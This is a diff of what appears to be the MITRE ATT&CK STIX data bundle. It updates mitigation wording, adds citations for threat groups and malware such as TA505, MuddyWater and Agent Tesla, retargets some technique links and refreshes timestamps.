"target_ref": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2",
"relationship_type": "mitigates",
"id": "relationship--6a3e8d7c-fdb3-4249-9f4e-7825e253bbfd",
- "description": "Require that all executables be placed in write-protected directories.",
+ "description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution. Require that all executables be placed in write-protected directories.",
"type": "relationship",
- "modified": "2020-03-26T20:03:27.700Z",
+ "modified": "2020-05-20T15:12:39.563Z",
"created": "2020-03-13T17:48:59.195Z"
},
{
@@ -167327,9 +168662,9 @@
"description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016."
}
],
- "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application whitelisting tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )",
+ "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application control tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )",
"type": "relationship",
- "modified": "2020-03-26T20:03:27.736Z",
+ "modified": "2020-06-20T20:11:42.907Z",
"created": "2020-03-13T17:48:59.197Z"
},
{
@@ -167411,9 +168746,9 @@
"target_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34",
"relationship_type": "mitigates",
"id": "relationship--22ce2c93-ecd6-4627-b3f0-6f7476754c79",
- "description": "Adversaries may use new DLLs to execute this technique. Identify and block potentially malicious software executed through search order hijacking by using application whitelisting solutions capable of blocking DLLs loaded by legitimate software.",
+ "description": "Adversaries may use new DLLs to execute this technique. Identify and block potentially malicious software executed through search order hijacking by using application control solutions capable of blocking DLLs loaded by legitimate software.",
"type": "relationship",
- "modified": "2020-03-26T16:13:59.062Z",
+ "modified": "2020-06-20T20:11:42.891Z",
"created": "2020-03-13T18:11:08.487Z"
},
{
@@ -167461,7 +168796,7 @@
"id": "relationship--1c47aa23-d267-49f3-9faf-c45b6de0ad6e",
"description": "Update software regularly to include patches that fix DLL side-loading vulnerabilities.",
"type": "relationship",
- "modified": "2020-03-26T16:23:21.192Z",
+ "modified": "2020-06-20T22:05:42.679Z",
"created": "2020-03-13T19:41:37.989Z"
},
{
@@ -167475,7 +168810,7 @@
"id": "relationship--0eacc0c1-d7f7-42f6-b8c6-288f0b2f605e",
"description": "Install software in write-protected locations.",
"type": "relationship",
- "modified": "2020-03-26T16:23:21.205Z",
+ "modified": "2020-06-20T22:05:42.674Z",
"created": "2020-03-13T19:41:38.007Z"
},
{
@@ -167489,7 +168824,7 @@
"id": "relationship--4bcf6ed0-7650-4433-8293-19377bc60e24",
"description": "Use the program sxstrace.exe that is included with Windows along with manual inspection to check manifest files for side-loading vulnerabilities in software.",
"type": "relationship",
- "modified": "2020-03-26T16:23:21.207Z",
+ "modified": "2020-06-20T22:05:42.693Z",
"created": "2020-03-13T19:41:38.009Z"
},
{
@@ -167720,10 +169055,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
"relationship_type": "mitigates",
- "description": "Limit or restrict program execution using anti-virus software. On MacOS, whitelist programs that are allowed to have the plist tag. All other programs should be considered suspicious.",
+ "description": "Limit or restrict program execution using anti-virus software. On MacOS, allowlist programs that are allowed to have the plist tag. All other programs should be considered suspicious.",
"id": "relationship--1279ae2b-fb00-4980-a5cc-9a802ad2901d",
"type": "relationship",
- "modified": "2020-03-29T22:49:43.701Z",
+ "modified": "2020-06-20T20:11:42.900Z",
"created": "2020-03-13T20:26:49.687Z"
},
{
@@ -167940,19 +169275,6 @@
"modified": "2020-03-26T22:02:25.401Z",
"created": "2020-03-14T18:18:32.793Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
- "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
- "relationship_type": "revoked-by",
- "id": "relationship--0c1ac2fa-dae6-4713-8aba-7945dc8cf92f",
- "type": "relationship",
- "modified": "2020-03-14T18:19:15.012Z",
- "created": "2020-03-14T18:19:15.012Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -168165,10 +169487,10 @@
"source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
"target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
"relationship_type": "mitigates",
- "description": "Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network black and white lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1090/004).",
+ "description": "Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1090/004).",
"id": "relationship--a424a85c-a3c6-4d84-85f7-e55c8dbe21fc",
"type": "relationship",
- "modified": "2020-03-14T23:19:38.118Z",
+ "modified": "2020-06-20T20:46:36.698Z",
"created": "2020-03-14T23:19:38.118Z"
},
{
@@ -168193,10 +169515,10 @@
"source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
"target_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d",
"relationship_type": "mitigates",
- "description": "Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network black and white lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1090/004).",
+ "description": "Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1090/004).",
"id": "relationship--4735a1be-c556-4844-9554-d2313376f09a",
"type": "relationship",
- "modified": "2020-03-14T23:23:41.913Z",
+ "modified": "2020-06-20T20:46:36.683Z",
"created": "2020-03-14T23:23:41.913Z"
},
{
@@ -168236,7 +169558,7 @@
"description": "If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be domain fronting.",
"id": "relationship--2d63a9e6-9be2-44ea-8276-89ae92049509",
"type": "relationship",
- "modified": "2020-03-14T23:29:19.751Z",
+ "modified": "2020-06-20T20:53:20.509Z",
"created": "2020-03-14T23:29:19.751Z"
},
{
@@ -168411,7 +169733,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--50565ea3-2627-44b0-8dd3-155e37d425f3",
"type": "relationship",
- "modified": "2020-03-26T20:58:10.351Z",
+ "modified": "2020-06-20T22:28:45.436Z",
"created": "2020-03-15T14:59:15.466Z"
},
{
@@ -168445,7 +169767,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-28T00:43:24.363Z",
+ "modified": "2020-05-14T13:05:39.790Z",
"created": "2020-03-15T15:30:42.442Z"
},
{
@@ -168507,7 +169829,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-28T00:45:51.161Z",
+ "modified": "2020-05-14T13:05:39.798Z",
"created": "2020-03-15T15:34:30.892Z"
},
{
@@ -168569,7 +169891,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-28T00:50:31.503Z",
+ "modified": "2020-05-14T13:05:39.788Z",
"created": "2020-03-15T15:37:47.706Z"
},
{
@@ -168794,7 +170116,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-16T15:00:55.083Z",
+ "modified": "2020-06-26T12:42:08.050Z",
"created": "2020-03-16T14:49:02.682Z"
},
{
@@ -168805,7 +170127,7 @@
"source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f",
"target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84",
"relationship_type": "mitigates",
- "description": "Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should also include if default accounts have been enabled, or if new local accounts are created that have not be authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)",
+ "description": "Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should also include if default accounts have been enabled, or if new local accounts are created that have not be authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)\n\nLimit access to the root account and prevent users from modifying protected components through proper privilege separation (ex SELinux, grsecurity, AppArmor, etc.) and limiting Privilege Escalation opportunities.",
"id": "relationship--dafa1584-bdd9-4c46-be07-2d002a529948",
"external_references": [
{
@@ -168825,7 +170147,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-16T15:00:55.119Z",
+ "modified": "2020-06-26T12:42:08.076Z",
"created": "2020-03-16T14:49:02.706Z"
},
{
@@ -168839,7 +170161,7 @@
"description": "Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining control of valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information. MFA can also be used to restrict access to cloud resources and APIs. ",
"id": "relationship--2686dfb7-60ab-424c-add2-2f164a98cfa4",
"type": "relationship",
- "modified": "2020-03-16T15:00:55.125Z",
+ "modified": "2020-06-26T12:42:08.079Z",
"created": "2020-03-16T14:49:02.709Z"
},
{
@@ -168853,7 +170175,7 @@
"description": "Ensure only valid password filters are registered. Filter DLLs must be present in Windows installation directory (C:\\Windows\\System32\\ by default) of a domain controller and/or local computer with a corresponding entry in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages. ",
"id": "relationship--fc8ef14d-1a07-4f96-85c3-b62ba6bcffc1",
"type": "relationship",
- "modified": "2020-03-16T15:00:55.114Z",
+ "modified": "2020-06-26T12:42:08.074Z",
"created": "2020-03-16T14:49:02.714Z"
},
{
@@ -168989,7 +170311,7 @@
"id": "relationship--36f7b849-03af-4567-be71-2e1eb1520b2a",
"description": "Set directory access controls to prevent file writes to the search paths for applications, both in the folders where applications are run from and the standard dylib folders.",
"type": "relationship",
- "modified": "2020-03-27T15:32:06.325Z",
+ "modified": "2020-06-20T22:06:47.264Z",
"created": "2020-03-16T15:23:31.062Z"
},
{
@@ -169285,16 +170607,21 @@
"description": "The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018."
},
{
- "description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018.",
+ "source_name": "Fortinet Agent Tesla June 2017",
"url": "https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html",
- "source_name": "Fortinet Agent Tesla June 2017"
+ "description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018."
+ },
+ {
+ "source_name": "Bitdefender Agent Tesla April 2020",
+ "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/",
+ "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has used SMTP for C2 communications.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has used SMTP for C2 communications.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)",
"relationship_type": "uses",
"id": "relationship--c5401268-6b27-4088-9f2e-5439f68685d9",
"type": "relationship",
- "modified": "2020-03-18T19:25:30.323Z",
+ "modified": "2020-05-20T13:38:07.113Z",
"created": "2020-03-17T00:03:03.734Z"
},
{
@@ -170012,14 +171339,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"description": "The [Regin](https://attack.mitre.org/software/S0019) malware platform supports many standard protocols, including SMB.(Citation: Kaspersky Regin)",
"relationship_type": "uses",
"id": "relationship--5e23c694-3f4a-43f7-823b-8ea36558c928",
"type": "relationship",
- "modified": "2020-03-17T02:25:11.600Z",
+ "modified": "2020-06-29T01:54:53.455Z",
"created": "2020-03-17T02:25:11.600Z"
},
{
@@ -170272,21 +171599,21 @@
"target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
"external_references": [
{
- "description": "Salvio, J.. (2014, June 27). New Banking Malware Uses Network Sniffing for Data Theft. Retrieved March 25, 2019.",
+ "source_name": "Trend Micro Banking Malware Jan 2019",
"url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/",
- "source_name": "Trend Micro Banking Malware Jan 2019"
+ "description": "Salvio, J.. (2014, June 27). New Banking Malware Uses Network Sniffing for Data Theft. Retrieved March 25, 2019."
},
{
- "source_name": "Carbon Black Emotet Apr 2019",
+ "description": "Lee, S.. (2019, April 24). Emotet Using WMI to Launch PowerShell Encoded Code. Retrieved May 24, 2019.",
"url": "https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/",
- "description": "Lee, S.. (2019, April 24). Emotet Using WMI to Launch PowerShell Encoded Code. Retrieved May 24, 2019."
+ "source_name": "Carbon Black Emotet Apr 2019"
}
],
"description": "[Emotet](https://attack.mitre.org/software/S0367) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Trend Micro Banking Malware Jan 2019)(Citation: Carbon Black Emotet Apr 2019)",
"relationship_type": "uses",
"id": "relationship--219dcd0b-a6fe-47d4-99b9-24d945b1f168",
"type": "relationship",
- "modified": "2020-03-17T13:31:00.273Z",
+ "modified": "2020-07-15T13:03:46.808Z",
"created": "2020-03-17T13:31:00.273Z"
},
{
@@ -170578,26 +171905,36 @@
"description": "Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019."
},
{
- "source_name": "Cybereason TA505 April 2019",
+ "description": "Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019.",
"url": "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware",
- "description": "Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019."
+ "source_name": "Cybereason TA505 April 2019"
},
{
- "source_name": "ProofPoint SettingContent-ms July 2018",
+ "description": "Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat",
- "description": "Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019."
+ "source_name": "ProofPoint SettingContent-ms July 2018"
},
{
- "source_name": "Proofpoint TA505 Mar 2018",
+ "description": "Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware",
- "description": "Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019."
+ "source_name": "Proofpoint TA505 Mar 2018"
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
}
],
- "description": "[TA505](https://attack.mitre.org/groups/G0092) has used lures to get users to click links in emails and attachments. For example, [TA505](https://attack.mitre.org/groups/G0092) makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. (Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)",
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used lures to get users to click links in emails and attachments. For example, [TA505](https://attack.mitre.org/groups/G0092) makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. (Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)",
"relationship_type": "uses",
"id": "relationship--71ee0311-3fdc-4baf-8c3e-2143416b742c",
"type": "relationship",
- "modified": "2020-03-17T15:01:32.560Z",
+ "modified": "2020-05-29T20:09:49.528Z",
"created": "2020-03-17T15:01:32.560Z"
},
{
@@ -170798,13 +172135,18 @@
"url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.",
"source_name": "Secureworks BRONZE BUTLER Oct 2017"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used VBS and VBE scripts for execution.(Citation: Secureworks BRONZE BUTLER Oct 2017)",
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used VBS and VBE scripts for execution.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)",
"relationship_type": "uses",
"id": "relationship--529360d5-172a-4326-b993-e3af75d3e7af",
"type": "relationship",
- "modified": "2020-03-17T18:23:51.085Z",
+ "modified": "2020-06-24T01:27:32.169Z",
"created": "2020-03-17T18:23:51.085Z"
},
{
@@ -170855,7 +172197,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "intrusion-set--4a2ce82e-1a74-468a-a6fb-bbead541383c",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"external_references": [
{
"source_name": "Talos Group123",
@@ -170867,7 +172209,7 @@
"relationship_type": "uses",
"id": "relationship--e7e7718a-b0e1-48cb-a9e8-bcbd0cf25cec",
"type": "relationship",
- "modified": "2020-03-20T15:54:09.709Z",
+ "modified": "2020-06-23T19:36:25.179Z",
"created": "2020-03-17T18:52:24.021Z"
},
{
@@ -170949,7 +172291,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"external_references": [
{
"source_name": "Cobalt Strike TTPs Dec 2017",
@@ -170962,11 +172304,11 @@
"source_name": "CobaltStrike Daddy May 2017"
}
],
- "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can use VBA, [PowerSploit](https://attack.mitre.org/software/S0194), and other scripting frameworks to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)",
+ "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can use VBA to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)",
"relationship_type": "uses",
"id": "relationship--b3b5b384-feb1-43b1-8880-7b9ade558cf7",
"type": "relationship",
- "modified": "2020-03-20T15:42:14.664Z",
+ "modified": "2020-06-23T19:49:20.750Z",
"created": "2020-03-17T19:11:12.421Z"
},
{
@@ -171050,16 +172392,16 @@
"target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"external_references": [
{
- "source_name": "McAfee Honeybee",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/"
+ "source_name": "McAfee Honeybee"
}
],
"description": "[Honeybee](https://attack.mitre.org/groups/G0072) embeds a Visual Basic script within a malicious Word document as part of initial access; the script is executed when the Word document is opened.(Citation: McAfee Honeybee)",
"relationship_type": "uses",
"id": "relationship--543c0cc3-3726-46ed-a839-e7268479127c",
"type": "relationship",
- "modified": "2020-03-17T19:20:54.067Z",
+ "modified": "2020-04-16T19:41:40.700Z",
"created": "2020-03-17T19:20:54.067Z"
},
{
@@ -171097,11 +172439,11 @@
"source_name": "FireEye APT32 May 2017"
}
],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has used hidden or non-printing characters to help masquerade service names, such as appending a Unicode no-break space character to a legitimate service name.(Citation: FireEye APT32 May 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has used hidden or non-printing characters to help masquerade service names, such as appending a Unicode no-break space character to a legitimate service name. [APT32](https://attack.mitre.org/groups/G0050) has also impersonated the legitimate Flash installer file name \"install_flashplayer.exe\".(Citation: FireEye APT32 May 2017)",
"relationship_type": "uses",
"id": "relationship--6f0b6cfd-ebe2-46f3-9be1-0075237dbcb9",
"type": "relationship",
- "modified": "2020-03-17T23:17:09.409Z",
+ "modified": "2020-06-26T17:02:14.327Z",
"created": "2020-03-17T23:17:09.409Z"
},
{
@@ -171396,14 +172738,14 @@
"source_name": "FireEye MuddyWater Mar 2018"
},
{
- "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/",
+ "source_name": "MuddyWater TrendMicro June 2018",
"description": "Villanueva, M., Co, M. (2018, June 14). Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor. Retrieved July 3, 2018.",
- "source_name": "MuddyWater TrendMicro June 2018"
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/"
},
{
- "source_name": "Securelist MuddyWater Oct 2018",
+ "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.",
"url": "https://securelist.com/muddywater/88059/",
- "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018."
+ "source_name": "Securelist MuddyWater Oct 2018"
},
{
"description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.",
@@ -171414,13 +172756,23 @@
"description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
"url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
"source_name": "ClearSky MuddyWater Nov 2018"
+ },
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
+ },
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
}
],
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used VBScript files to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload, as well as macros.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)[(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used VBScript files to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload, as well as macros.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)",
"relationship_type": "uses",
"id": "relationship--4a0ee05d-f020-4811-bba6-56d12c15e275",
"type": "relationship",
- "modified": "2020-03-18T18:01:36.710Z",
+ "modified": "2020-05-29T01:24:37.322Z",
"created": "2020-03-18T18:01:36.710Z"
},
{
@@ -171429,7 +172781,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "malware--705f0783-5f7d-4491-b6b7-9628e6e006d2",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"external_references": [
{
"source_name": "fsecure NanHaiShu July 2016",
@@ -171441,7 +172793,7 @@
"relationship_type": "uses",
"id": "relationship--2a94575a-8e47-4d69-964b-f96210a673bd",
"type": "relationship",
- "modified": "2020-03-18T18:14:53.814Z",
+ "modified": "2020-06-23T20:05:03.359Z",
"created": "2020-03-18T18:14:53.814Z"
},
{
@@ -171470,27 +172822,6 @@
"modified": "2020-03-18T18:37:06.748Z",
"created": "2020-03-18T18:37:06.748Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "malware--5c6ed2dc-37f4-40ea-b2e1-4c76140a388c",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
- "external_references": [
- {
- "description": "Gorelik, M.. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019.",
- "url": "http://blog.morphisec.com/security-alert-fin8-is-back",
- "source_name": "Morphisec ShellTea June 2019"
- }
- ],
- "description": "[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used shellcode scripts.(Citation: Morphisec ShellTea June 2019)",
- "relationship_type": "uses",
- "id": "relationship--163c7849-cde3-4677-8ded-df69047e3a6d",
- "type": "relationship",
- "modified": "2020-03-18T18:52:40.972Z",
- "created": "2020-03-18T18:52:40.972Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -171526,11 +172857,11 @@
"source_name": "Cybereason Cobalt Kitty 2017"
}
],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) enumerated administrative users and DC servers using the commands net localgroup administrators and net group \"Domain Controllers\" /domain.(Citation: Cybereason Cobalt Kitty 2017)",
